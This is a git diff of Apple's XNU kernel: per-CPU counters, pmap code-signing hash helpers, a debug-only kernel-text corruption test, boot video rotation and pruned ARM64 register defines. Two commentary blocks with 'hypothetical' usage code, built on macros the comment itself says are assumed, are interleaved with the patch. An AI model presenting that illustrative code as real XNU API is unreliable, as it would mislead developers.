+ * notice and this permission notice appear in all copies of the
+ * software, derivative works or modified versions, and any portions
+ * thereof, and that both notices appear in supporting documentation.
+ *
+ * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
+ * CONDITION.  CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
+ * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
+ *
+ * Carnegie Mellon requests users of this software to return to
+ *
+ *  Software Distribution Coordinator  or  Software.Distribution@CS.CMU.EDU
+ *  School of Computer Science
+ *  Carnegie Mellon University
+ *  Pittsburgh PA 15213-3890
+ *
+ * any improvements or extensions that they make and grant Carnegie Mellon
+ * the rights to redistribute these changes.
+ */
+#include <kern/assert.h>
+#include <kern/cpu_data.h>
+#include <kern/counter.h>
+#include <kern/zalloc.h>
+#include <machine/atomic.h>
+#include <machine/machine_routines.h>
+#include <machine/cpu_number.h>
+
+OS_OVERLOADABLE
+void
+counter_add(scalable_counter_t *counter, uint64_t amount)
+{
+       disable_preemption();
+       (*zpercpu_get(*counter)) += amount;
+       enable_preemption();
+}
+
+OS_OVERLOADABLE
+void
+counter_inc(scalable_counter_t *counter)
+{
+       disable_preemption();
+       (*zpercpu_get(*counter))++;
+       enable_preemption();
+}
+
+OS_OVERLOADABLE
+void
+counter_dec(scalable_counter_t *counter)
+{
+       disable_preemption();
+       (*zpercpu_get(*counter))--;
+       enable_preemption();
+}
+
+OS_OVERLOADABLE
+void
+counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount)
+{
+       (*zpercpu_get(*counter)) += amount;
+}
+
+OS_OVERLOADABLE
+void
+counter_inc_preemption_disabled(scalable_counter_t *counter)
+{
+       (*zpercpu_get(*counter))++;
+}
+
+OS_OVERLOADABLE
+void
+counter_dec_preemption_disabled(scalable_counter_t *counter)
+{
+       (*zpercpu_get(*counter))--;
+}
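The new osfmk/x86_64/counter.c above is the per-CPU backend for the scalable counter API: each update touches only the calling CPU's slot (zpercpu_get) with preemption disabled, so hot paths never contend on a shared cache line. A hedged usage sketch; counter_inc() is defined above, while SCALABLE_COUNTER_DEFINE and counter_load are assumptions about the rest of <kern/counter.h>, which is not shown in this diff.

#include <kern/counter.h>

/* Assumed definition macro from kern/counter.h (not part of this hunk). */
SCALABLE_COUNTER_DEFINE(example_packets_dropped);

void
example_drop_packet(void)
{
        /* per-CPU increment; cheap enough for a hot path */
        counter_inc(&example_packets_dropped);
}

uint64_t
example_read_drops(void)
{
        /* assumed accessor that sums the per-CPU slots */
        return counter_load(&example_packets_dropped);
}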
index 79ad35a0eb81ca09e3e640d0fce40ea24799f9ca..aa370791b5cad71c0c9f153f27d071eddec70ba8 100644 (file)
@@ -3275,6 +3275,41 @@ pmap_lookup_in_static_trust_cache(const uint8_t __unused cdhash[20])
        return false;
 }
 
+SIMPLE_LOCK_DECLARE(pmap_compilation_service_cdhash_lock, 0);
+uint8_t pmap_compilation_service_cdhash[CS_CDHASH_LEN] = { 0 };
+
+void
+pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL);
+       memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN);
+       simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+#if DEVELOPMENT || DEBUG
+       printf("Added Compilation Service CDHash through the PMAP: 0x%02X 0x%02X 0x%02X 0x%02X\n", cdhash[0], cdhash[1], cdhash[2], cdhash[3]);
+#endif
+}
+
+bool
+pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       bool match = false;
+
+       simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL);
+       if (bcmp(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN) == 0) {
+               match = true;
+       }
+       simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+#if DEVELOPMENT || DEBUG
+       if (match) {
+               printf("Matched Compilation Service CDHash through the PMAP\n");
+       }
+#endif
+
+       return match;
+}
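A hypothetical call pattern for the pair of routines above (no caller appears in this hunk): a trusted code-signing path records the compilation service's cdhash once, and later checks compare a candidate hash against it. CS_CDHASH_LEN and the two pmap routines come from the diff; everything else is illustrative.

#include <stdbool.h>

static void
example_register_compilation_service(const uint8_t signed_cdhash[CS_CDHASH_LEN])
{
        /* record the hash once; later callers simply overwrite under the lock */
        pmap_set_compilation_service_cdhash(signed_cdhash);
}

static bool
example_is_compilation_service(const uint8_t candidate[CS_CDHASH_LEN])
{
        return pmap_match_compilation_service_cdhash(candidate);
}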
+
 bool
 pmap_in_ppl(void)
 {
@@ -3307,3 +3342,26 @@ pmap_free_reserved_ppl_page(void __unused *kva)
 {
        // Unsupported on this architecture.
 }
+
+#if DEVELOPMENT || DEBUG
+/*
+ * Used for unit testing recovery from text corruptions.
+ */
+kern_return_t
+pmap_test_text_corruption(pmap_paddr_t pa)
+{
+       int pai;
+       uint8_t *va;
+
+       pai = ppn_to_pai(atop(pa));
+       if (!IS_MANAGED_PAGE(pai)) {
+               return KERN_FAILURE;
+       }
+
+       va = (uint8_t *)PHYSMAP_PTOV(pa);
+       va[0] = 0x0f; /* opcode for UD2 */
+       va[1] = 0x0b;
+
+       return KERN_SUCCESS;
+}
+#endif /* DEVELOPMENT || DEBUG */
index 1ddd6fc651a755cfbf502dbf496c78caa81a79ec..b3b8676329f6c73314d5f3cd1dc40a716a5ef50c 100644 (file)
@@ -407,7 +407,7 @@ pe_run_debug_command(command_buffer_element_t *command_buffer)
                                nanoseconds_to_absolutetime(command_buffer->delay_us * NSEC_PER_USEC, &deadline);
                                deadline += ml_get_timebase();
                                while (ml_get_timebase() < deadline) {
-                                       ;
+                                       os_compiler_barrier();
                                }
                        }
                }
index 8ff54da6c1c9ac1981cf63d26be0e6f375c20aac..2934d4da8aa79ec95f533a9cc3dfa8d98ce1418c 100644 (file)
@@ -394,7 +394,10 @@ PE_init_platform(boolean_t vm_initialized, void *args)
                PE_state.video.v_width = boot_args_ptr->Video.v_width;
                PE_state.video.v_height = boot_args_ptr->Video.v_height;
                PE_state.video.v_depth = (boot_args_ptr->Video.v_depth >> kBootVideoDepthDepthShift) & kBootVideoDepthMask;
-               PE_state.video.v_rotate = (boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask;
+               PE_state.video.v_rotate = (
+                       ((boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask) +    // rotation
+                       ((boot_args_ptr->Video.v_depth >> kBootVideoDepthBootRotateShift)  & kBootVideoDepthMask) // add extra boot rotation
+                       ) % 4;
                PE_state.video.v_scale = ((boot_args_ptr->Video.v_depth >> kBootVideoDepthScaleShift) & kBootVideoDepthMask) + 1;
                PE_state.video.v_display = boot_args_ptr->Video.v_display;
                strlcpy(PE_state.video.v_pixelFormat, "BBBBBBBBGGGGGGGGRRRRRRRR", sizeof(PE_state.video.v_pixelFormat));
index b555aa1e2a209f0bb5a77c9cab7a5b104e9db1a9..cf8dab9fbc638f52911e1ae62e8b333ef7aeb817 100644 (file)
@@ -629,8 +629,8 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) dockchannel_uart_seri
 
 /****************************************************************************/
 #ifdef  PI3_UART
-vm_offset_t pi3_gpio_base_vaddr = 0;
-vm_offset_t pi3_aux_base_vaddr = 0;
+static vm_offset_t pi3_gpio_base_vaddr = 0;
+static vm_offset_t pi3_aux_base_vaddr = 0;
 static int
 pi3_uart_tr0(void)
 {
@@ -716,6 +716,10 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) pi3_uart_serial_funct
 };
 
 #endif /* PI3_UART */
+
+/*****************************************************************************/
+
+
 /*****************************************************************************/
 
 static void
@@ -778,6 +782,7 @@ serial_init(void)
        }
 #endif /* PI3_UART */
 
+
 #ifdef DOCKCHANNEL_UART
        uint32_t no_dockchannel_uart = 0;
        if (SecureDTFindEntry("name", "dockchannel-uart", &entryP) == kSuccess) {
index 9a9c313613de46613842eb1416b1818273e47d75..f5a82bb197211092d6193cc99518d882d172c213 100644 (file)
@@ -30,6 +30,7 @@ struct Boot_Video {
 #define kBootVideoDepthDepthShift       (0)
 #define kBootVideoDepthRotateShift      (8)
 #define kBootVideoDepthScaleShift       (16)
+#define kBootVideoDepthBootRotateShift  (24)
 
 #define kBootFlagsDarkBoot              (1 << 0)
 
index 27025566708853989fdc7792cf2094a12a2cbb02..ade05dc8eaa4e3da6437aac689a611d3b5a9a07a 100644 (file)
@@ -14,7 +14,6 @@
 
 #ifdef APPLE_ARM64_ARCH_FAMILY
 
-#define ARM64_REG_HID0                    S3_0_c15_c0_0
 #define ARM64_REG_HID0_LoopBuffDisb       (1<<20)
 #define ARM64_REG_HID0_AMXCacheFusionDisb (1ULL<<21)
 #define ARM64_REG_HID0_ICPrefLimitOneBrn  (1<<25)
 #define ARM64_REG_HID0_ICPrefDepth_bmsk   (7ULL <<ARM64_REG_HID0_ICPrefDepth_bshift)
 #define ARM64_REG_HID0_ICPrefDepth_VALUE  (1ULL <<ARM64_REG_HID0_ICPrefDepth_bshift)
 
-#define ARM64_REG_EHID0               S3_0_c15_c0_1
 #define ARM64_REG_EHID0_nfpRetFwdDisb (1ULL<<45)
 
-#define ARM64_REG_HID1                              S3_0_c15_c1_0
 #define ARM64_REG_HID1_disCmpBrFusion               (1<<14)
 #define ARM64_REG_HID1_forceNexL3ClkOn              (1<<15)
 #define ARM64_REG_HID1_rccForceAllIexL3ClksOn       (1<<23)
 #define ARM64_REG_HID1_enaBrKillLimit               (1ULL << 60)
 #define ARM64_REG_HID1_SpareBit6                    (1ULL << 60)
 
-#define ARM64_REG_EHID1                             S3_0_c15_c1_1
 #define ARM64_REG_EHID1_disMSRSpecDAIF              (1ULL << 30)
 
-#define ARM64_REG_HID2                    S3_0_c15_c2_0
 #define ARM64_REG_HID2_disMMUmtlbPrefetch (1<<13)
 #define ARM64_REG_HID2_ForcePurgeMtb      (1<<17)
 
-#define ARM64_REG_EHID2                   S3_0_c15_c2_1
 #define ARM64_REG_EHID2_ForcePurgeMtb     (1<<17)
 
-#define ARM64_REG_HID3                                        S3_0_c15_c3_0
 #define ARM64_REG_HID3_DisColorOpt                            (1<<2)
 #define ARM64_REG_HID3_DisDcZvaCmdOnly                        (1<<25)
 #define ARM64_REG_HID3_DisArbFixBifCrd                        (1ULL<<44)
 #define ARM64_REG_HID3_DisXmonSnpEvictTriggerL2StarvationMode (1<<54)
 #define ARM64_REG_HID3_DevPcieThrottleEna                     (1ULL<<63)
 
-#define ARM64_REG_EHID3                 S3_0_c15_c3_1
 #define ARM64_REG_EHID3_DisColorOpt     (1<<2)
 #define ARM64_REG_EHID3_DisDcZvaCmdOnly (1<<25)
 
-#define ARM64_REG_HID4                          S3_0_c15_c4_0
-#define ARM64_REG_EHID4                         S3_0_c15_c4_1
-
 #define ARM64_REG_HID4_DisDcMVAOps                      (1<<11)
 #define ARM64_REG_HID4_DisSpecLnchRead                  (1<<33)
 #define ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd         (1<<39)
@@ -78,7 +67,6 @@
 #define ARM64_REG_HID4_disSpecLSRedirect                (1<<9)
 #define ARM64_REG_HID4_DisSTNTWidget                    (1<<1)
 
-#define ARM64_REG_HID5                          S3_0_c15_c5_0
 #define ARM64_REG_HID5_DisHwpLd                 (1<<44)
 #define ARM64_REG_HID5_DisHwpSt                 (1<<45)
 #define ARM64_REG_HID5_DisFill2cMerge           (1ULL << 61)
 #define ARM64_REG_HID5_CrdPrbSnpRsvd_mask       (0xFULL << ARM64_REG_HID5_CrdPrbSnpRsvd_shift)
 #define ARM64_REG_HID5_CrdPrbSnpRsvd_VALUE(x)   (x << ARM64_REG_HID5_CrdPrbSnpRsvd_shift)
 
-#define ARM64_REG_EHID5            S3_0_c15_c5_1
 #define ARM64_REG_EHID5_DisFillByp (1 << 35)
 
-#define ARM64_REG_HID6                          S3_0_c15_c6_0
 #define ARM64_REG_HID6_UpCrdTknInitC2_shift     (5)
 #define ARM64_REG_HID6_UpCrdTknInitC2_mask      (0x1FULL << ARM64_REG_HID6_UpCrdTknInitC2_shift)
 #define ARM64_REG_HID6_DisClkDivGating          (1ULL << 55)
 
-#define ARM64_REG_HID7                                                 S3_0_c15_c7_0
 #define ARM64_REG_HID7_forceNonSpecTargetedTimerSel_shift              (24)
 #define ARM64_REG_HID7_forceNonSpecTargetedTimerSel_mask               (3ULL << ARM64_REG_HID7_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_HID7_forceNonSpecTargetedTimerSel_VALUE              (3ULL << ARM64_REG_HID7_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_HID7_forceNonSpecIfStepping                          (1ULL << 20)
+#define ARM64_REG_HID7_forceNonSpecIfSpecFlushPtrNEBlkRtrPtr           (1ULL << 19)
 #define ARM64_REG_HID7_forceNonSpecIfSpecFlushPtrInvalidAndMPValid     (1ULL << 16)
 #define ARM64_REG_HID7_disNexFastFmul                                  (1 << 10)
 #define ARM64_REG_HID7_disCrossPick2                                   (1ULL << 7)
 
-#define ARM64_REG_HID8                     S3_0_c15_c8_0
 #define ARM64_REG_HID8_DataSetID0_VALUE    (0xF << 4)
 #define ARM64_REG_HID8_DataSetID1_VALUE    (0xF << 8)
 #define ARM64_REG_HID8_WkeForceStrictOrder (0x1ULL << 35)
 #define ARM64_REG_HID8_DataSetID2_VALUE    (0xF << 56)
 #define ARM64_REG_HID8_DataSetID3_VALUE    (0xF << 60)
 
-#define ARM64_REG_HID9                         S3_0_c15_c9_0
 #define ARM64_REG_HID9_TSOAllowDcZvaWC         (1ULL << 26)
 #define ARM64_REG_HID9_TSOSerializeVLDmicroops (1ULL << 29)
 #define ARM64_REG_HID9_EnableFixBug51667805    (1ULL << 48)
 #define ARM64_REG_HID9_EnableFixBug58566122    (3ULL << 53)
 #define ARM64_REG_HID9_HidEnFix55719865        (1ULL << 55)
 
-#define ARM64_REG_EHID9            S3_0_c15_c9_1
 #define ARM64_REG_EHID9_DevThrottle2Ena        (1ULL << 5)
 
-#define ARM64_REG_HID10            S3_0_c15_c10_0
 #define ARM64_REG_HID10_DisHwpGups (1ULL << 0)
 
-#define ARM64_REG_EHID10                        S3_0_c15_c10_1
 #define ARM64_REG_EHID10_rccDisPwrSavePrfClkOff (1ULL << 19)
 #define ARM64_REG_EHID10_ForceWStDrainUc        (1ULL << 32)
 #define ARM64_REG_EHID10_DisZVATemporalTSO      (1ULL << 49)
 
-#if defined(APPLETYPHOON) || defined(APPLETWISTER)
-#define ARM64_REG_HID11                      S3_0_c15_c13_0
-#else /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
-#define ARM64_REG_HID11                      S3_0_c15_c11_0
-#endif /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
 #define ARM64_REG_HID11_DisX64NTLnchOpt      (1ULL << 1)
 #define ARM64_REG_HID11_DisFillC1BubOpt      (1ULL << 7)
 #define ARM64_REG_HID11_HidEnFixUc55719865   (1ULL << 15)
 #define ARM64_REG_HID11_DisFastDrainOpt      (1ULL << 23)
 #define ARM64_REG_HID11_DisLDNTWidget        (1ULL << 59)
 
-#define ARM64_REG_EHID11                     S3_0_c15_c11_1
 #define ARM64_REG_EHID11_SmbDrainThresh_mask (3ULL << 40)
 
-#define ARM64_REG_HID13                      S3_0_c15_c14_0
 #define ARM64_REG_HID13_PreCyc_shift         (14)
 #define ARM64_REG_HID13_PreCyc_mask          (0xFULL << ARM64_REG_HID13_PreCyc_shift)
 #define ARM64_REG_HID13_PreCyc_VALUE         (0x4ULL << ARM64_REG_HID13_PreCyc_shift)
 
-#define ARM64_REG_HID14                                 S3_0_c15_c15_0
 #define ARM64_REG_HID14_NexSleepTimeOutCyc_shift        (0)
 #define ARM64_REG_HID14_NexSleepTimeOutCyc_VALUE        0x7D0ULL
 
-#define ARM64_REG_HID16                      S3_0_c15_c15_2
 #define ARM64_REG_HID16_leqThrottleAggr      (1ULL << 18)
 #define ARM64_REG_HID16_SpareBit0            (1ULL << 56)
 #define ARM64_REG_HID16_EnRs4Sec             (1ULL << 57)
 #define ARM64_REG_HID16_EnMPCyc7             (1ULL << 62)
 #define ARM64_REG_HID16_SpareBit7            (1ULL << 63)
 
-#define ARM64_REG_HID17                         S3_0_c15_c15_5
 #define ARM64_REG_HID17_CrdEdbSnpRsvd_shift     (0)
 #define ARM64_REG_HID17_CrdEdbSnpRsvd_mask      (0x7ULL << ARM64_REG_HID17_CrdEdbSnpRsvd_shift)
 #define ARM64_REG_HID17_CrdEdbSnpRsvd_VALUE     (0x2ULL << ARM64_REG_HID17_CrdEdbSnpRsvd_shift)
 
-#define ARM64_REG_HID18                      S3_0_c15_c11_2
 #define ARM64_REG_HID18_HVCSpecDisable       (1ULL << 14)
 #define ARM64_REG_HID18_SpareBit17           (1ULL << 49)
 
-#define ARM64_REG_HID21                            S3_0_c15_c1_3
 #define ARM64_REG_HID21_EnLdrexFillRply            (1ULL << 19)
 #define ARM64_REG_HID21_LdqRtrWaitForOldStRelCmpl  (1ULL << 33)
 #define ARM64_REG_HID21_DisCdpRplyPurgedTrans      (1ULL << 34)
 
 #if defined(APPLETYPHOON) || defined(APPLETWISTER)
-#define ARM64_REG_CYC_CFG              S3_5_c15_c4_0
 #define ARM64_REG_CYC_CFG_skipInit     (1ULL<<30)
 #define ARM64_REG_CYC_CFG_deepSleep    (1ULL<<24)
 #else /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
-#define ARM64_REG_ACC_OVRD             S3_5_c15_c6_0
-#if defined(APPLEMONSOON)
-#define ARM64_REG_ACC_EBLK_OVRD        S3_5_c15_c6_1 // EBLK_OVRD on Zephyr
-#endif /* defined(APPLEMONSOON) */
-
 #define ARM64_REG_ACC_OVRD_enDeepSleep                 (1ULL << 34)
 #define ARM64_REG_ACC_OVRD_disPioOnWfiCpu              (1ULL << 32)
 #define ARM64_REG_ACC_OVRD_dsblClkDtr                  (1ULL << 29)
 #define ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep (2ULL << 15)
 #define ARM64_REG_ACC_OVRD_ok2PwrDnSRM_mask            (3ULL << 13)
 #define ARM64_REG_ACC_OVRD_ok2PwrDnSRM_deepsleep       (3ULL << 13)
-
 #endif /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
 
-#define ARM64_REG_CYC_OVRD                     S3_5_c15_c5_0
 #define ARM64_REG_CYC_OVRD_irq_mask            (3<<22)
 #define ARM64_REG_CYC_OVRD_irq_disable         (2<<22)
 #define ARM64_REG_CYC_OVRD_fiq_mask            (3<<20)
 #define ARM64_REG_CYC_OVRD_dsblSnoopPTime      (1ULL << 31)  /// Don't fetch the timebase from the P-block
 #endif /* APPLEMONSOON */
 
-#define ARM64_REG_LSU_ERR_STS                  S3_3_c15_c0_0
 #define ARM64_REG_LSU_ERR_STS_L1DTlbMultiHitEN (1ULL<<54)
-
-#define ARM64_REG_E_LSU_ERR_STS                S3_3_c15_c2_0
-
-#define ARM64_REG_LSU_ERR_CTL                  S3_3_c15_c1_0
 #define ARM64_REG_LSU_ERR_CTL_L1DTlbMultiHitEN (1ULL<<3)
 
-#define ARM64_REG_FED_ERR_STS                  S3_4_C15_C0_0
-
-#define ARM64_REG_E_FED_ERR_STS                S3_4_C15_C0_2
-
-#define ARM64_REG_MMU_ERR_STS                  S3_6_c15_c0_0
-
-#define ARM64_REG_E_MMU_ERR_STS                s3_6_c15_c2_0
-
-#define ARM64_REG_L2C_ERR_STS                  S3_3_c15_c8_0
-
-#define ARM64_REG_L2C_ERR_ADR                  S3_3_c15_c9_0
-
-#define ARM64_REG_L2C_ERR_INF                  S3_3_c15_c10_0
-
-#define ARM64_REG_MIGSTS_EL1                   S3_4_c15_c0_4
-
-#define ARM64_REG_DPC_ERR_STS                  S3_5_c15_c0_5
-
-#if defined(HAS_KTRR)
-
-#ifdef ASSEMBLER
-#define ARM64_REG_KTRR_LOWER_EL1 S3_4_c15_c2_3
-#define ARM64_REG_KTRR_UPPER_EL1 S3_4_c15_c2_4
-#define ARM64_REG_KTRR_LOCK_EL1  S3_4_c15_c2_2
-#else /* ASSEMBLER */
-#define ARM64_REG_KTRR_LOWER_EL1 "S3_4_c15_c2_3"
-#define ARM64_REG_KTRR_UPPER_EL1 "S3_4_c15_c2_4"
-#define ARM64_REG_KTRR_LOCK_EL1  "S3_4_c15_c2_2"
-#endif /* ASSEMBLER */
-
-#endif /* defined (HAS_KTRR) */
-
-#if defined(HAS_CTRR)
-
-#ifdef ASSEMBLER
-#define ARM64_REG_CTRR_A_LWR_EL1 S3_4_c15_c2_3
-#define ARM64_REG_CTRR_A_UPR_EL1 S3_4_c15_c2_4
-#define ARM64_REG_CTRR_CTL_EL1   S3_4_c15_c2_5
-#define ARM64_REG_CTRR_LOCK_EL1  S3_4_c15_c2_2
-
-#define ACC_CTRR_A_LWR_EL2       S3_4_c15_c11_0
-#define ACC_CTRR_A_UPR_EL2       S3_4_c15_c11_1
-#define ACC_CTRR_CTL_EL2         S3_4_c15_c11_4
-#define ACC_CTRR_LOCK_EL2        S3_4_c15_c11_5
-#else /* ASSEMBLER */
-#define ARM64_REG_CTRR_A_LWR_EL1 "S3_4_c15_c2_3"
-#define ARM64_REG_CTRR_A_UPR_EL1 "S3_4_c15_c2_4"
-#define ARM64_REG_CTRR_CTL_EL1   "S3_4_c15_c2_5"
-#define ARM64_REG_CTRR_LOCK_EL1  "S3_4_c15_c2_2"
-
-#define ACC_CTRR_A_LWR_EL2       "S3_4_c15_c11_0"
-#define ACC_CTRR_A_UPR_EL2       "S3_4_c15_c11_1"
-#define ACC_CTRR_CTL_EL2         "S3_4_c15_c11_4"
-#define ACC_CTRR_LOCK_EL2        "S3_4_c15_c11_5"
-#endif /* ASSEMBLER */
-
-#define CTRR_CTL_EL1_A_MMUOFF_WRPROTECT  (1 << 0)
-#define CTRR_CTL_EL1_A_MMUON_WRPROTECT   (1 << 1)
-#define CTRR_CTL_EL1_B_MMUOFF_WRPROTECT  (1 << 2)
-#define CTRR_CTL_EL1_B_MMUON_WRPROTECT   (1 << 3)
-#define CTRR_CTL_EL1_A_PXN               (1 << 4)
-#define CTRR_CTL_EL1_B_PXN               (1 << 5)
-#define CTRR_CTL_EL1_A_UXN               (1 << 6)
-#define CTRR_CTL_EL1_B_UXN               (1 << 7)
-
-#endif /* defined (HAS_CTRR) */
 
 #if defined(HAS_IPI)
-
 #define ARM64_REG_IPI_RR_TYPE_IMMEDIATE (0 << 28)
 #define ARM64_REG_IPI_RR_TYPE_RETRACT   (1 << 28)
 #define ARM64_REG_IPI_RR_TYPE_DEFERRED  (2 << 28)
 #define ARM64_REG_IPI_RR_TYPE_NOWAKE    (3 << 28)
-
-#if defined(HAS_CLUSTER)
-#define ARM64_REG_IPI_RR_LOCAL          __MSR_STR(S3_5_c15_c0_0)
-#define ARM64_REG_IPI_RR_GLOBAL         __MSR_STR(S3_5_c15_c0_1)
-#else /* defined(HAS_CLUSTER) */
-#define ARM64_REG_IPI_RR                __MSR_STR(S3_5_c15_c0_1)
-#endif /* defined(HAS_CLUSTER) */
-
-#define ARM64_REG_IPI_SR                __MSR_STR(S3_5_c15_c1_1)
-#define ARM64_REG_IPI_CR                __MSR_STR(S3_5_c15_c3_1)
-
 #endif /* defined(HAS_IPI) */
 
 
 #endif /* APPLE_ARM64_ARCH_FAMILY */
 
 #if defined(HAS_NEX_PG)
-#define ARM64_REG_HID13             S3_0_c15_c14_0
 #define ARM64_REG_HID13_RstCyc_mask (0xfULL << 60)
 #define ARM64_REG_HID13_RstCyc_val  (0xcULL << 60)
 
-#define ARM64_REG_HID14             S3_0_c15_c15_0
 #define ARM64_REG_HID14_NexPwgEn    (1ULL << 32)
 #endif /* defined(HAS_NEX_PG) */
 
-#define ARM64_REG_EHID20                                        S3_0_c15_c1_2
 #define ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_shift     (21)
 #define ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_mask      (3ULL << ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_VALUE     (3ULL << ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_EHID20_forceNonSpecIfSpecFlushPtrNEBlkRtrPtr  (1ULL << 16)
+#define ARM64_REG_EHID20_forceNonSpecIfOldestRedirVldAndOlder   (1ULL << 15)
 #define ARM64_REG_EHID20_trapSMC                                (1ULL << 8)
 #define ARM64_REG_EHID20_forceNonSpecIfOldestRedirVldAndOlder   (1ULL << 15)
 
 #if defined(HAS_BP_RET)
-#define ARM64_REG_ACC_CFG             S3_5_c15_c4_0
 #define ARM64_REG_ACC_CFG_bdpSlpEn    (1ULL << 2)
 #define ARM64_REG_ACC_CFG_btpSlpEn    (1ULL << 3)
 #define ARM64_REG_ACC_CFG_bpSlp_mask  3
 #define ARM64_REG_ACC_CFG_bpSlp_shift 2
 #endif /* defined(HAS_BP_RET) */
 
-
-#if defined(HAS_APPLE_PAC)
-
-
-#if ASSEMBLER
-#define ARM64_REG_APIAKEYLO_EL1        S3_0_c2_c1_0
-#define ARM64_REG_APIAKEYHI_EL1        S3_0_c2_c1_1
-#define ARM64_REG_APIBKEYLO_EL1        S3_0_c2_c1_2
-#define ARM64_REG_APIBKEYHI_EL1        S3_0_c2_c1_3
-
-#define ARM64_REG_APDAKEYLO_EL1        S3_0_c2_c2_0
-#define ARM64_REG_APDAKEYHI_EL1        S3_0_c2_c2_1
-#define ARM64_REG_APDBKEYLO_EL1        S3_0_c2_c2_2
-#define ARM64_REG_APDBKEYHI_EL1        S3_0_c2_c2_3
-
-#define ARM64_REG_APGAKEYLO_EL1        S3_0_c2_c3_0
-#define ARM64_REG_APGAKEYHI_EL1        S3_0_c2_c3_1
-#else /* ASSEMBLER */
-#define ARM64_REG_APIAKEYLO_EL1        "S3_0_c2_c1_0"
-#define ARM64_REG_APIAKEYHI_EL1        "S3_0_c2_c1_1"
-#define ARM64_REG_APIBKEYLO_EL1        "S3_0_c2_c1_2"
-#define ARM64_REG_APIBKEYHI_EL1        "S3_0_c2_c1_3"
-
-#define ARM64_REG_APDAKEYLO_EL1        "S3_0_c2_c2_0"
-#define ARM64_REG_APDAKEYHI_EL1        "S3_0_c2_c2_1"
-#define ARM64_REG_APDBKEYLO_EL1        "S3_0_c2_c2_2"
-#define ARM64_REG_APDBKEYHI_EL1        "S3_0_c2_c2_3"
-
-#define ARM64_REG_APGAKEYLO_EL1        "S3_0_c2_c3_0"
-#define ARM64_REG_APGAKEYHI_EL1        "S3_0_c2_c3_1"
-#endif /* ASSEMBLER */
-#endif /* HAS_APPLE_PAC */
-
 #if defined(HAS_VMSA_LOCK)
-
-#define ARM64_REG_VMSA_LOCK_EL1 S3_4_c15_c1_2
-
 #define VMSA_LOCK_VBAR_EL1      (1ULL << 0)
 #define VMSA_LOCK_SCTLR_EL1     (1ULL << 1)
 #define VMSA_LOCK_TCR_EL1       (1ULL << 2)
 #define VMSA_LOCK_TTBR0_EL1     (1ULL << 3)
 #define VMSA_LOCK_TTBR1_EL1     (1ULL << 4)
 #define VMSA_LOCK_SCTLR_M_BIT   (1ULL << 63)
-
 #endif /* HAS_VMSA_LOCK */
 
-
-
 #define MPIDR_PNE_SHIFT 16 // pcore not ecore
 #define MPIDR_PNE       (1 << MPIDR_PNE_SHIFT)
 
 
-
 #define CPU_PIO_CPU_STS_OFFSET               (0x100ULL)
 #define CPU_PIO_CPU_STS_cpuRunSt_mask        (0xff)
 
index 2d4d6690d7f3bcb53e93da6d596f19745f1e5128..0ae24bef825e345d9d724ec85a16f8bb98954c5b 100644 (file)
 #define MAX_CPU_CLUSTERS               2
 
 #define XNU_MONITOR                    1 /* Secure pmap runtime */
-#define XNU_MONITOR_T8020_DART         1 /* T8020 DART plugin for secure pmap runtime */
-#define T8020_DART_ALLOW_BYPASS        (1 << 1) /* DART allows translation bypass in certain cases */
-#define XNU_MONITOR_NVME_PPL           1 /* NVMe PPL plugin for secure pmap runtime */
-#define XNU_MONITOR_ANS2_SART          1 /* ANS2 SART plugin for secure pmap runtime */
-#define PMAP_CS                        1
-#define PMAP_CS_ENABLE                 1
 #endif  /* ARM64_BOARD_CONFIG_T8027 */
 
 #ifdef ARM64_BOARD_CONFIG_T8028
 #ifdef ARM64_BOARD_CONFIG_T8103
 #include <pexpert/arm64/H13.h>
 #include <pexpert/arm64/spr_locks.h>
+#undef HAS_SIQ
 
 #define MAX_L2_CLINE                   7
 #define MAX_CPUS                       8
 #define CORE_NCTRS                     8 /* Placeholder; KPC is not enabled for this target */
 #endif  /* ARM64_BOARD_CONFIG_BCM2837 */
 
+
 #ifndef HAS_UNCORE_CTRS
 #undef UNCORE_VERSION
 #undef UNCORE_PER_CLUSTER
index 1bcf4990e4fad01622e643eebd7fa501aedf07cd..f43d16e4be6cd9aa8b3f98ed4bb58d34aefe6292 100644 (file)
@@ -42,6 +42,7 @@ struct Boot_Video {
 #define kBootVideoDepthDepthShift       (0)
 #define kBootVideoDepthRotateShift      (8)
 #define kBootVideoDepthScaleShift       (16)
+#define kBootVideoDepthBootRotateShift  (24)
 
 #define kBootFlagsDarkBoot              (1ULL << 0)
 
index de2f95e8df19aac4b1b04aadee1e9e8adfe3d846..7486640e7b2bbde0301f294a834e1c6d96a3ffe8 100644 (file)
@@ -202,14 +202,20 @@ typedef struct boot_args {
        /* Version 2, Revision 1 */
